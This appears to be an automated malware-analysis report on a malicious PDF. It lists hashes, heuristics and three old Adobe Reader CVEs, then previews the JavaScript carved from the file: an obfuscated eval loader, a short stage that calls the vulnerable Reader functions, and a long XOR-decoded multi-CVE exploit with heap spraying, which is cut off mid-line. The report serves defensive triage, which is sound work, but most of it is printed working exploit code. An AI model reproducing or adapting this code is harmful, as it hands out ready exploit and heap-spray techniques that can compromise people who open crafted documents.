Malicious PDF — malware analysis report

Static analysis result for SHA-256 7982e22dbf0fbd08…

MALICIOUS

PDF

7.1 KB Created: 2010-10-12 14:20:47 Authoring application: Bgecolemdisoginelejaci (via 092e1Vinavepleziueti)
MD5: 843b2cd7636d9198898d4b316410446f SHA-1: cddbc9b718a6830a6859ecbc4f14b63f3b65476a SHA-256: 7982e22dbf0fbd0824e20c40530125e37a889c76c2e95c3acf382254d8c13a96
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The sample is a PDF file that leverages multiple known vulnerabilities (CVE-2009-4324, CVE-2009-0927, CVE-2008-2992) to execute embedded JavaScript. The extracted JavaScript, particularly 'page_word_xor_stage_000.js', appears to be a multi-stage exploit kit designed to download and execute further malicious content. The ML classifier also strongly indicated maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js
9831312efd52fddc921fa42b5f0524183ce37990ed0b97fffae684698b8a4b87		 pdf-javascript-stream PDF /JS object 10 at offset 0x1291 2403 bytes
Preview script
First 1,000 lines of the extracted script
var oDOJ = null;

try {

function z(pGD,bEX){return pGD+bEX};
var hSN=1;
var mTCZ="leng"+"th";
var pMH=String("repla"+"ce");
var jGZ=0;
function hWB(zKF){this.pYB=this.l=zKF};


var lUV=this;
var zAD=300;
var jCDO="va&r& &y~T&K~Vq=qtqh%i~s%.qlq;~tq=%\'&gqe&t~P~a%g&e~N~\'%;~l&W~L%=~t%+~\'&t&hqW%o&r~dq\'~;%n~WqV%=~t%+q\'qu~mqW%o%r~d~s&\'q;qp%QqZq=~\'~p&aqg%e~N%u~m~\'~;qj&WqFq ~=q ~9~3& q;%x~Y~R~=%\'%\'q;&n&E&J&=~\'&j&o~i%n~\'~;qlqE&L~=&\'&\'%;&j~G%Z~=~0q;&b&C~D~=~Sqt&r~i&nqg&;~p%U&Fq=%\'&squ%b%s%tqr&\'~;qj~M%P&=q\'qeqv%a%l~\'~;&m&T~C&Zq=~\'&l~e&nqg&tqhq\'q;~p&GqL~=%\'q\\q\\qx&\'q;%p%E&Rq=q\'&t&o~Sqtqr&i%nqgq\'%;%z&K~R&=~\'qp%a&rqsqe&I&n%t&\'&;~r%A&R~=~\'%f~r~o~m%C~h~a~r&C&o&d&e~\'&;&v&G~N~=&\'qc%h~a~rqC~o&d~e%Aqt&\'~;&h%S%Nq=&4q/&4q;ql~W%R%=~1&+&4~;qhqQ&Nq=&2q0~0~+q5%5~;ql~U%Vq=q\'%dqo~c&\'~;%lqYqL&=~3&3&2q;qh&W~Rq=&[q]%;qh&Y%N%=&\'q\'%;%fqC~Bq=~1q6q;&h~W&V%=&2q;~k~J~G~X~=q4~;~n%W%V&M~=&yqT&K&V~[~n%W&V~]q(%y&T%K~V%[&pqQ%Z%]&)&;&f~o~rq(%l%O~=&j&G&Z&;%l&O&<q ~n&WqV&M~;% ~l~O~+&+q)q{qv%a%r& %wqR~W~B%=%y%T%K%V~[%l%W&L&]q(&y~T%K&Vq[&p~QqZ%]~,~lqO&,qt~r%uqe%)~;&l~E&Lq=%[ql~EqL&,&w~RqWqBq]q[&nqEqJ&]%(&x~Y&Rq)%;%;%}qf~o%r%(%l~O~=&0%;&l~Oq ~<& ql%E&L~[~mqTqC~Z~]q;& &l&Oq+~=qh%W%Vq)%{&f~=~l~EqL&[&p&UqF%]~(%l~O%,~h%WqV%)&;~v%=~p~a%r~s%e&I~nqt&(%f~,qf%C~B~)&;qp%Q%B~=%v%^qj~W%F&;~z%SqR&=&pqQ&B~.&t%o~S%t&r~i&nqgq(&f~CqB&)q;%zqS%R%=~(qz%S%Rq[qm&T&C~Z&]~=&=~h&S~N~)q q?& ~\'%0%\'% ~+& qz~S&R& &:q &z~S~R%;&h%W~R%.%p%u%s&h%(&zqS&R%)&;q}%t%r&y~ q{~h&Y~Nq=~n%e%wq qS~t%r%i%n&g~(qp%G~Lq &+& ~h&WqR&[%n&EqJ~]%(%p~G&Lq)%)%;qa%p&p~[qj%M&P%]%(%\'~h&Y~N%=%\"%\'~+&h&Y&N&+%\'%\"%;~\'&)%;qy%T~KqV%.~xqA%L~=%(%hqY&N~[&p~U&Fq]~(qhqY~N&[~m&TqC~Zq]~-ql%Y~L&)~)%;&yqT%K~V%.~bqCqT&=&(%h&Y~Nq[~pqUqFq]%(&j%G~Zq,qh&Y%N&[&m~T~C%Z%]&-%l~Y%Lq)&)q;%f~M~H&(&)%;~}% ~cqa%t%c&h%(&h%MqJq)~{qiqfq(qy&TqK&V&.~b&C&T~)&{&t~r%y~ &{%a%p&p%[%jqMqP~]q(~y%T%KqVq.&bqC~Tq)~;&}% %c&a~t~c~hq(&h~MqJq)~{%aqpqp~.%a%l~e%r&tq(qh&MqJ~)~;&}~}q %e%l~s&e% %{&a&p~pq.&a%l%e~r%t%(%\'qN~O~ &CqO%D%E%\'~)~;q}&}q";
var xYR='';
var gHID=/[q&%~]/g;
var xS=String("Func"+"tion");
var eTWN=new String("ch"+"ar"+"At");
;


function d(rMJ){zSD=xYR; for(lO=rMJ[mTCZ];lO >= jGZ;lO--) zSD=z(zSD, rMJ[eTWN](lO)); return zSD}


jCDO=jCDO[pMH](gHID, xYR);
jMP=d(new String("lav"+"e"));

;


hWB.prototype={

dOJ : function(fKZ){

if(fKZ > zAD){

this.l[jMP](jCDO);

} else {

oDOJ.dOJ(fKZ+hSN);

}
}
};

var oDOJ=new hWB(lUV);
oDOJ.dOJ(jGZ);

} catch(hYN){

}
legacy_pdfkit_stage_000.js
18699f9d55ae1f1fd22bc427d0f09ac790fd8fafb1557dc66370fe40318c5f52		 deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 153 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords-XOR Pidief stage normalized */
app.viewerVersion;
Collab.getIcon("N."+unescape("%09"));
media.newPlayer(null);
util.printf("%45000f", 1);
page_word_xor_stage_000.js
444f6419aa3ad11f5771853dfe35a7533b9a7394226c729ffe069624be3b11f0		 deobfuscated-js page-word continuous-hex XOR decoded JavaScript (decompressed, key=0x5D) at offset 0x8C 6786 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 3 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
var hCN="\x03\x55\x01\x03\x0c\x57\x03\x54\x5a\x5b\x59\x03\x05\x56\x55\x04\x54\x5d\x59\x58\x5b\x5c\x09\x0a\x57\x45\x49\x44\x12\x46\x42\x13\x44\x1c\x4a\x4a\x79\x20\x76\x27\x27\x24\x7f\x29\x2f\x78\x7b\x2e\x7e\x7b\x7f\x62\x61\x62\x37\x30\x6d\x63\x6f\x6e\x38\x68\x18\x4b\x09\x3b\x1e\x0f\x1e\x5f\x10\x40\x1e";var bQR="\x33\x64\x33\x30\x38\x62\x35\x63\x62\x62\x38\x61\x66\x32\x30\x62\x33\x35\x30\x32\x30\x30\x64\x64\x38\x35\x38\x36\x61\x32\x37\x65";var zYJ=this.l.info[hGX("\x54\x3c")].replace(/[\s]/g, xYR);var fSX=app;var lUV=this.pYB;fSJ=hGX("\x57\x01\x51\x45\x5f");rOB=hGX("\x5a\x0a\x55\x5f");nAX=hGX("\x43\x16\x5c\x54\x4d\x01\x50\x11");bMN=hGX("\x41\x0b\x46\x5e\x5c");fOJ=hGX("\x5a\x0a\x57\x55\x40\x2d\x53");rQR=hGX("\x52\x11\x47\x58\x57\x10");hQH=hGX("\x47\x0d\x47\x5c\x5d");tYL=hGX("\x40\x14\x5f\x59\x4c");pMH=hGX("\x41\x01\x43\x5c\x59\x01\x50");nQT=hGX("\x43\x05\x41\x43\x5d\x24\x59\x0c\x03\x16");tAH=hGX("\x45\x0d\x56\x47\x5d\x10\x63\x06\x10\x11\x51\x0e\x08");var hIV=this.l;var rMV = hIV[rOB];var pOP = (rMV[nAX][pUF](jGZ,lWR) == fSJ);if(pOP){ fSX.alert(hGX("\x77\x21\x71\x65\x7f\x42\x5c\x10\x42\x2d\x76"));}var nAXA=Date;var qLIH=Math;var x=util;var xAL= hIV.xAL;var hCH=hGX("\x16\x11");var rOP=hGX("\x6c\x3b\x6c\x6f\x67");var tWH=hGX("\x5e\x01\x57\x59\x59");var bOV=hGX("\x5d\x01\x44\x60\x54\x03\x4c\x06\x10");var hSV=hGX("\x40\x11\x51\x43\x4c\x10\x5c\x0d\x05");var hOB=hGX("\x43\x16\x5a\x5e\x4c\x06");var tWD = hGX("\x0c");var pEN = hGX("\x15");var dGD = hGX("\x0e");var xQL = hGX("\x41\x01\x52\x54\x5d\x10\x6a\x15\x07\x10\x4b\x08\x09\x5c");var hCT = hGX("\x56\x1c\x5d");var dWD = true;var vAF = true;var xUD = true;if(!hIV.xAL) { rOD();};function bQJ(tAT){ var pIT = hYZ(); var jUF = nYB(); var zYZ = bOP(); jUF=rSR(jUF, zYZ, tAT); var vCV = bQN(jUF, pIT); xAL = hGX(xAL); xAL = xAL[pMH](rOP, pIT); xAL = xAL + vCV; return bCR(jAT(xAL));};function nYB(){ var rMJ = (rMV[rQR] + rMV[hQH])[pMH](/[\s]/g, xYR); var nKZ = xWN(rMJ, zYJ, hGX(hCN)); return nKZ;};function tKL(jUJ,zGB){ while(jUJ.length * hWV < zGB){ jUJ += jUJ; } jUJ = jUJ[hSV](jGZ, zGB / hWV); return jUJ;};function vWT(){ function pID() { var rMJ=hGX("\x43\x24\x02\x01\x09\x53\x04\x52\x53\x53\x09\x50\x57\x03\x01\x53\x02\x04\x01\x03\x01\x01\x55\x55\x09\x04\x18\x0c\x41\x4b\x4e\x1c\x4a\x55\x02\x01"); x[hOB](rMJ, new nAXA()); } var vEL=(12000); fUX=new Array(); var pKR = hGX("\x16\x11\x0a\x00\x01\x52\x10\x16\x5b\x52\x01\x51"); pKR=bCR(pKR); var jUJI=bQJ(hGX("\x70\x32\x76\x1d\x0a\x52\x05\x5a\x4f\x56\x0b\x53\x52\x6d\x02")); while(pKR.length <= (0x8000)){ pKR+=pKR; } pKR=pKR.substr(jGZ, (0x8000) - jUJI[mTCZ]); for(lO=jGZ; lO < vEL; lO++) { fUX[lO]=pKR + jUJI; } if(vEL){ pID(); pID(); try { hIV[tWH][bOV](null); } catch(e) {} pID(); }};function aFOR(){ var j = hGX("\x16\x11\x03\x71\x08\x23\x10\x16\x52\x23\x08\x20"); var hOR = hGX("\x16\x50\x06\x00\x08\x52\x53"); var zIT=hGX("\x43\x16\x5a\x5e\x4c\x04"); var jUJI=bQJ(hGX("\x70\x32\x76\x1d\x0a\x52\x05\x5b\x4f\x50\x01\x58\x54")); var pAJ=bCR(j + j); var vKV = pAJ + jUJI; var xAF = bCR(j); var dYV = (20); var tKL=dYV + vKV[mTCZ]; while(xAF.length < tKL){ xAF += xAF; } var dCD=xAF[hSV](jGZ,tKL); var nOB=xAF[hSV](jGZ,xAF[mTCZ] - tKL); while(nOB.length + tKL < (0x40000)){ nOB =nOB + nOB + dCD; } var nOJ=new Array(); for(var lO=jGZ; lO < (1400); lO++){ nOJ[lO] = nOB + vKV; } var nMJ=xYR; for(var lO=jGZ; lO < (296); lO++){ nMJ+=hGX("\x0a"); } nMJ = jYN(nMJ); x[zIT](hOR, nMJ);};function tQB(){ var s=xYR; var nED=hGX("\x70\x0b\x5f\x5c\x59\x00"); var tGJ=hGX("\x54\x01\x47\x79\x5b\x0d\x5b"); if(hIV[nED][tGJ]) { var nOJ=new Array(); var jUJI=bQJ(hGX("\x70\x32\x76\x1d\x0a\x52\x05\x5a\x4f\x52\x01\x53\x51")); var hEN=(0x400000); var vYN=jUJI[mTCZ] * hWV; var zGB = hEN - (vYN + (0x38)); var xEN=bCR(hGX("\x16\x11\x0a\x00\x01\x52\x10\x16\x5b\x52\x01\x51")); xEN=tKL(xEN, zGB); var nYD=((0x0c0c0c0c) - hEN) / hEN; for(var lO=jGZ; lO < nYD; lO++){ nOJ[lO]=xEN + jUJI; } var pUL=unescape(hGX("\x16\x54\x0a")); while(pUL.length < (0x4000)){ pUL+=pUL; } pUL=hGX("\x7d\x4a") + pUL; hIV[nED][tGJ](pUL); } else { }};function lEL(){ var zYZ = bOP(); if(dWD && ((zYZ >= (9) && zYZ < (9
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.